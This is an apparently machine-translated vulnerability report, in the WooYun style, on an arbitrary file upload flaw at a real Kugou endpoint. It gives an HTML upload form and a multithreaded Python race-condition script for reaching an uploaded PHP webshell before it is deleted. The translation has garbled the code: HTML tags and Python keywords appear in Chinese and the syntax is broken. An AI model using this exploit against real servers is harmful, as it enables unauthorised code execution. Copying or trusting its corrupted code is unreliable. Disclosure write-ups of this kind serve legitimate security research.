酷狗主站的一处任意文件上传可shell

漏洞标题 酷狗主站的一处任意文件上传可shell 相关厂商 酷狗 漏洞作者 李长歌 提交时间 2016-05-15 10:09 公开时间 2016-06-30 10:00 漏洞类型 文件上传导致任意代…

漏洞标题 酷狗主站的任意文件上传可以是shell 相关制造商 酷狗 漏洞作者 李长歌 提交时间 2016-05-15 10: 09 公共时间 2016-06-30 10: 00 漏洞类型 文件上载会导致任意代码执行 危险等级 高 自我评估等级 15 漏洞状态 制造商已确认 标签标签 未检查文件上传内容,文件上传漏洞,任意文件上传 漏洞详细信息 任何上传地址都是http://www.kugou.com/kf/kf/app/upload.php 保存html文件并上传 < HTML> <身体GT; < form action='http://www.kugou.com/kf/kf/app/upload.php'methodal-'post' MIME类型='的multipart/form-data的' > < label for='file'>文件名:</label> < input type='file'name='imgFile'id='imgFile'/> < br /> < input type='submit'name='submit'value='Submit'/> < /形式> < /体> </HTML> 获取路径{'错误': 0,'url':'。\/upload \ /1463241818.php'} 但我们无法通过访问http://找到该页面www.kugou.com/kf/kf/app/upload/1463241818.php

上传时刻已删除。 使用条件竞争,在删除之前生成shell,可以猜测上传后的路径 编写脚本以在上传php文件时同时猜测访问路径 导入urllib2 导入线程 进口时间 Def request_uri(): Uri='http://www.kugou.com/kf/kf/app/upload/%s.php'%str(time.time())。split('。')[0] 试试: Req=urllib2.Request(uri) Response=urllib2.urlopen(req).read() 打印'除%s'%uri 打印回复 除了例外,e: 通过 Def start(): 线程=[] 对于我在xrange(30): Threads.append(threading.Thread(目标=REQUEST_URI)) 对于线程:中的t T.start() 对于线程:中的t T.join() 如果__name __=='__ main__': 而真: 开始()

漏洞证明:

修理计划: Shell已被删除,修复 版权声明:请注明出处。李长歌@乌云